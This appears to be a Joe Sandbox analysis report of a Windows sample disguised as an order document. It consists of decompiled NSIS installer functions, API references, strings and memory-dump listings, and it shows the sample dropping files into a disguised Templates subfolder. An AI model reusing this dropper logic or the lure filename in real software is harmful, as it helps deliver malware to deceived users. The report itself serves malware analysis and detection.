				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", 0x400);
				_t89 = E00405C07(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t92 = L"C:\\Users\\Arthur\\Desktop";
				E00406032(L"C:\\Users\\Arthur\\Desktop", _t91);
				E00406032(L"Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", E00405A32(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x7976fc = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402D8A(1);
					__eflags =  *0x7a8a54 - _t82;
					if( *0x7a8a54 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E00403235( *0x7a8a54 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00403027(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x7a8a50 = _t94;
							 *0x7a8a58 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x7a8a5c =  *0x7a8a5c + 1;
								__eflags =  *0x7a8a5c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405BC2(0x7a8a60, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403235( *0x78b6f4);
					_t65 = E0040321F( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x7a8a54) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E0040321F(0x797700, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402D8A(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x7a8a54;
						if( *0x7a8a54 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402D8A(0);
							}
							goto L20;
						}
						E00405BC2( &_v44, 0x797700, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x78b6f4; // 0x24cc4
						 *0x7a8ae0 =  *0x7a8ae0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x7a8a54 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t93 = _t80 - 4;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x7976fc; // 0x253b8
						if(__eflags < 0) {
							_v12 = E004064B9(_v12, 0x797700, _t90);
						}
						 *0x78b6f4 =  *0x78b6f4 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402df6
0x00402df9
0x00402dfc
0x00402dff
0x00402e05
0x00402e16
0x00402e1b
0x00402e2e
0x00402e33
0x00402e36
0x00402e3c
0x00000000
0x00402e3e
0x00402e49
0x00402e4f
0x00402e60
0x00402e67
0x00402e6d
0x00402e6f
0x00402e74
0x00402e76
0x00402f63
0x00402f65
0x00402f6a
0x00402f71
0x00000000
0x00000000
0x00402f73
0x00402f76
0x00402f9a
0x00402f9f
0x00402fa5
0x00402fb0
0x00402fb5
0x00402fb8
0x00402fb9
0x00402fba
0x00402fbc
0x00402fc1
0x00402fc4
0x00402fd7
0x00402fdb
0x00402fe3
0x00402fe8
0x00402fea
0x00402fea
0x00402fea
0x00402ff2
0x00402ff2
0x00402ff5
0x00402ff6
0x00402ff6
0x00402ff9
0x00402ffb
0x00402ffb
0x00402ffb
0x00403005
0x0040300b
0x00403019
0x0040301e
0x00000000
0x0040301e
0x00000000
0x00402fc4
0x00402f7e
0x00402f89
0x00402f8e
0x00402f90
0x00000000
0x00000000
0x00402f95
0x00402f98
0x00000000
0x00000000
0x00000000
0x00402e7c
0x00402e81
0x00402e86
0x00402e8a
0x00402e91
0x00402e96
0x00402e98
0x00402e9a
0x00402e9a
0x00402e9e
0x00402ea3
0x00402ea5
0x00402fcf
0x00402fc6
0x00000000
0x00402fc6
0x00402eab
0x00402eb2
0x00402f2e
0x00402f32
0x00402f36
0x00402f3b
0x00000000
0x00402f32
0x00402ebb
0x00402ec0
0x00402ec3
0x00402ec8
0x00000000
0x00000000
0x00402eca
0x00402ed1
0x00000000
0x00000000
0x00402ed3
0x00402eda
0x00000000
0x00000000
0x00402edc
0x00402ee3
0x00000000
0x00000000
0x00402ee5
0x00402eec
0x00000000
0x00000000
0x00402eee
0x00402ef4
0x00402efd
0x00402f03
0x00402f06
0x00402f08
0x00402f0e
0x00000000
0x00000000
0x00402f14
0x00402f18
0x00402f20
0x00402f20
0x00402f23
0x00402f26
0x00402f28
0x00402f2a
0x00402f2a
0x00000000
0x00402f28
0x00402f1a
0x00402f1e
0x00000000
0x00000000
0x00000000
0x00402f3c
0x00402f3c
0x00402f42
0x00402f4e
0x00402f4e
0x00402f51
0x00402f57
0x00402f59
0x00402f59
0x00402f61
0x00402f61
0x00000000
0x00402f61

APIs

GetTickCount.KERNEL32 ref: 00402DFF
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,00000400,?,?,00000000,00403517,?), ref: 00402E1B

Part of subcall function 00405C07: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00405C0B
Part of subcall function 00405C07: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403517,?), ref: 00405C2D

GetFileSize.KERNEL32(00000000,00000000,Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00402E67

Strings

Error launching installer, xrefs: 00402E3E
Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, xrefs: 00402E5B
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, xrefs: 00402E05, 00402E14, 00402E28, 00402E48
C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
soft, xrefs: 00402EDC
Inst, xrefs: 00402ED3
Null, xrefs: 00402EE5
"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", xrefs: 00402DF4
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DF5

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe$soft
API String ID: 4283519449-3375540769
Opcode ID: 2249d346c310f13e90e060258289ef97018bdecfafda78b47c803c2d5af002aa
Instruction ID: ab97cff943281949067decbc104515b53a1facb94f92f7dd678b53d189ae88d2
Opcode Fuzzy Hash: 2249d346c310f13e90e060258289ef97018bdecfafda78b47c803c2d5af002aa
Instruction Fuzzy Hash: 6351F671940206ABCB109F65DE49B9E7BB8FB15394F20813BF904B62C1D7BC9D809B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E00401767(FILETIME* __ebx, void* __eflags) {
				void* __edi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t81;
				void* _t82;
				WCHAR* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 0xc) = E00402BBF(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x2c) & 0x00000007;
				_t35 = E00405A5D( *(_t86 - 0xc));
				_push( *(_t86 - 0xc));
				_t84 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E004059E6(E00406032(_t84, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis\\Grusendes\\Stoser\\Unappealingness\\Dermobranchiate")), ??);
				} else {
					E00406032();
				}
				E004062C6(_t84);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406375(_t84);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x20);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405BE2(_t84);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405C07(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 8) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E00405191(0xffffffe2,  *(_t86 - 0xc));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x7a8ac8;
						goto L32;
					} else {
						E00406032("C:\Users\Arthur\AppData\Local\Temp\nspD224.tmp", _t81);
						E00406032(_t81, _t84);
						E00406054(_t77, _t81, _t84, "C:\Users\Arthur\AppData\Local\Temp\nspD224.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x18)));
						E00406032(_t81, "C:\Users\Arthur\AppData\Local\Temp\nspD224.tmp");
						_t64 = E00405777("C:\Users\Arthur\AppData\Local\Temp\nspD224.tmp\System.dll",  *(_t86 - 0x2c) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x7a8ac8 =  &( *0x7a8ac8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t84);
								_push(0xfffffffa);
								E00405191();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E00405191(0xffffffea,  *(_t86 - 0xc));
				 *0x7a8af4 =  *0x7a8af4 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t86 - 8));
				_push( *((intOrPtr*)(_t86 - 0x24)));
				_t45 = E00403027(); // executed
				 *0x7a8af4 =  *0x7a8af4 - 1;
				__eflags =  *(_t86 - 0x20) - 0xffffffff;
				_t82 = _t45;
				if( *(_t86 - 0x20) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 8), _t86 - 0x20, _t77, _t86 - 0x20); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x1c)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x1c)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 8));
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E00406054(_t77, _t82, _t84, _t84, 0xffffffee);
					} else {
						E00406054(_t77, _t82, _t84, _t84, 0xffffffe9);
						lstrcatW(_t84,  *(_t86 - 0xc));
					}
					_push(0x200010);
					_push(_t84);
					E00405777();
					goto L29;
				}
				goto L33;
			}

0x00401767
0x0040176e
0x0040177a
0x0040177d
0x00401782
0x00401785
0x0040178c
0x004017a8
0x0040178e
0x0040178f
0x0040178f
0x004017ae
0x004017b3
0x004017b3
0x004017b7
0x004017ba
0x004017bf
0x004017c1
0x004017c3
0x004017c8
0x004017c8
0x004017d3
0x004017d3
0x004017e4
0x004017e6
0x004017e6
0x004017e7
0x004017e7
0x004017ea
0x004017ed
0x004017f0
0x004017f0
0x004017f7
0x00401806
0x0040180b
0x0040180e
0x00401811
0x00000000
0x00000000
0x00401813
0x00401816
0x0040186c
0x00401871
0x004015ae
0x0040281e
0x0040281e
0x00402a4c
0x00402a4f
0x00402a4f
0x00000000
0x00401818
0x0040181e
0x00401825
0x00401832
0x0040183d
0x00401853
0x00401853
0x00401856
0x00000000
0x0040185c
0x0040185c
0x0040185d
0x0040187a
0x00402a55
0x00402a55
0x00402a55
0x0040185f
0x0040185f
0x00401860
0x00401493
0x00402288
0x00402288
0x00402288
0x0040185d
0x00401856
0x00402a57
0x00402a5b
0x00402a5b
0x0040188a
0x0040188f
0x00401895
0x00401896
0x00401897
0x0040189a
0x0040189d
0x004018a2
0x004018a8
0x004018ac
0x004018ae
0x004018b6
0x004018c2
0x004018b0
0x004018b0
0x004018b4
0x00000000
0x00000000
0x004018b4
0x004018cb
0x004018d1
0x004018d3
0x00000000
0x004018d9
0x004018d9
0x004018dc
0x004018f4
0x004018de
0x004018e1
0x004018ea
0x004018ea
0x004018f9
0x004018fe
0x00402283
0x00000000
0x00402283
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate,?,?,00000031), ref: 004017CD

Part of subcall function 00406032: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,0040332D,Overcaustically Setup,NSIS Error), ref: 0040603F

Part of subcall function 00405191: lstrlenW.KERNEL32(007A0F20,00000000,007924F8,762E23A0,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C9
Part of subcall function 00405191: lstrlenW.KERNEL32(00403168,007A0F20,00000000,007924F8,762E23A0,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D9
Part of subcall function 00405191: lstrcatW.KERNEL32(007A0F20,00403168), ref: 004051EC
Part of subcall function 00405191: SetWindowTextW.USER32(007A0F20,007A0F20), ref: 004051FE
Part of subcall function 00405191: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405224
Part of subcall function 00405191: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523E
Part of subcall function 00405191: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524C

Strings

Call, xrefs: 00401785, 0040178E, 0040179B, 004017AD, 004017B9, 004017EF, 00401805, 00401823, 0040185F, 004018E0, 004018E9, 004018F3, 004018FE
C:\Users\user\AppData\Local\Temp\nspD224.tmp, xrefs: 00401819, 00401837
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate, xrefs: 00401796
C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dll, xrefs: 0040182D, 00401849

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nspD224.tmp$C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate$Call
API String ID: 1941528284-1014108552
Opcode ID: f68a6b2c34e2433bc227599e278aafb616f0a180d0c639fbdfc3b46ee5da03b6
Instruction ID: 9699be85dc7bc18e029f6e3bff89e0f5bb762e6a6aa9adbfdaf5ed0cd7dffae0
Opcode Fuzzy Hash: f68a6b2c34e2433bc227599e278aafb616f0a180d0c639fbdfc3b46ee5da03b6
Instruction Fuzzy Hash: A341D571940515BBCF10BBB5CC46DAF3679EF06369B20823BF122B10E1DB3C8A519A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004025E5 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E004025E5(intOrPtr __ebx, void* __esi) {
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t73;
				void* _t76;

				 *((intOrPtr*)(_t73 - 0xc)) = __ebx;
				_t64 = 2;
				 *((intOrPtr*)(_t73 - 0x3c)) = _t64;
				_t65 = E00402BA2(_t64);
				_t76 = _t65 - 1;
				 *((intOrPtr*)(_t73 - 0x48)) = _t65;
				if(_t76 < 0) {
					L36:
					 *0x7a8ac8 =  *0x7a8ac8 +  *(_t73 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x48) = 0x3ff;
					}
					if( *__esi == __bx) {
						L34:
						__ecx =  *(__ebp - 0x10);
						__eax =  *(__ebp - 0xc);
						 *( *(__ebp - 0x10) +  *(__ebp - 0xc) * 2) = __bx;
						if(_t76 == 0) {
							 *(_t73 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 8) = __ebx;
						 *(__ebp - 0x14) = E00405F92(__ecx, __esi);
						if( *(__ebp - 0x48) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x30)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x20)) != __ebx ||  *(__ebp - 0xc) != __ebx || E00405CE8( *(__ebp - 0x14), __ebx) >= 0) {
										__eax = __ebp - 0x40;
										if(E00405C8A( *(__ebp - 0x14), __ebp - 0x40, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x38;
									_push(__ebx);
									_push(__ebp - 0x38);
									__eax = 2;
									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x20)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x14), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x20)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x38);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x3c) = __ecx;
											 *(__ebp - 0x40) = __eax;
											if( *((intOrPtr*)(__ebp - 0x20)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00405F79( *(__ebp - 0x10), __ax & 0x0000ffff);
											} else {
												__ebp - 0x40 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x40, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x40);
												} else {
													__esi =  *(__ebp - 0x3c);
													__esi =  ~( *(__ebp - 0x3c));
													while(1) {
														_t21 = __ebp - 0x38;
														 *_t21 =  *(__ebp - 0x38) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x40) = 0xfffd;
														if( *_t21 == 0) {
															goto L22;
														}
														 *(__ebp - 0x3c) =  *(__ebp - 0x3c) - 1;
														__esi = __esi + 1;
														__eax = SetFilePointer( *(__ebp - 0x14), __esi, __ebx, 1); // executed
														__ebp - 0x40 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x40, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x20)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 8) == 0xd ||  *(__ebp - 8) == 0xa) {
														if( *(__ebp - 8) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x3c) =  ~( *(__ebp - 0x3c));
															__eax = SetFilePointer( *(__ebp - 0x14),  ~( *(__ebp - 0x3c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0x10);
															 *(__ebp - 0xc) =  *(__ebp - 0xc) + 1;
															 *( *(__ebp - 0x10) +  *(__ebp - 0xc) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) + 1;
														 *( *(__ebp - 0x10) +  *(__ebp - 0xc) * 2) = __ax;
														 *(__ebp - 8) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 0xc);
							} while ( *(__ebp - 0xc) <  *(__ebp - 0x48));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004025e7
0x004025ea
0x004025ec
0x004025ef
0x004025f4
0x004025f7
0x004025fa
0x00402a4c
0x00402a4f
0x00402600
0x00402600
0x00402607
0x00402609
0x00402609
0x0040260f
0x00402773
0x00402773
0x00402776
0x0040277b
0x004015ae
0x0040281e
0x0040281e
0x00000000
0x00402615
0x00402616
0x00402621
0x00402624
0x00402630
0x00402634
0x004026cc
0x004026e4
0x004026f4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040263a
0x0040263a
0x0040263d
0x0040263e
0x00402641
0x00402646
0x0040264d
0x00402655
0x00000000
0x0040265b
0x0040265b
0x00402660
0x00000000
0x00402666
0x00402666
0x0040266e
0x00402671
0x00402674
0x0040272f
0x00402736
0x0040267a
0x00402680
0x0040268c
0x004026f6
0x004026f6
0x0040268e
0x0040268e
0x00402691
0x00402693
0x00402693
0x00402693
0x00402696
0x0040269b
0x0040269e
0x00000000
0x00000000
0x004026a0
0x004026a3
0x004026ab
0x004026b7
0x004026c5
0x00000000
0x004026c7
0x00000000
0x004026c7
0x00000000
0x004026c5
0x00402693
0x004026f9
0x004026fc
0x00000000
0x004026fe
0x00402703
0x00402744
0x00402766
0x0040276d
0x00402752
0x00402752
0x00402758
0x0040275b
0x0040275b
0x00000000
0x0040270c
0x0040270c
0x00402712
0x00402718
0x0040271c
0x0040271f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040271f
0x00402703
0x004026fc
0x00402674
0x00402660
0x00402655
0x00000000
0x00402721
0x00402721
0x00402724
0x0040272d
0x00000000
0x00402624
0x0040260f
0x00402a55
0x00402a5b

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1

Part of subcall function 00405CE8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,?,?,004025CA,00000000,00000000,?,00000000,00000011), ref: 00405CFE

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D

Strings

9, xrefs: 00402630

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
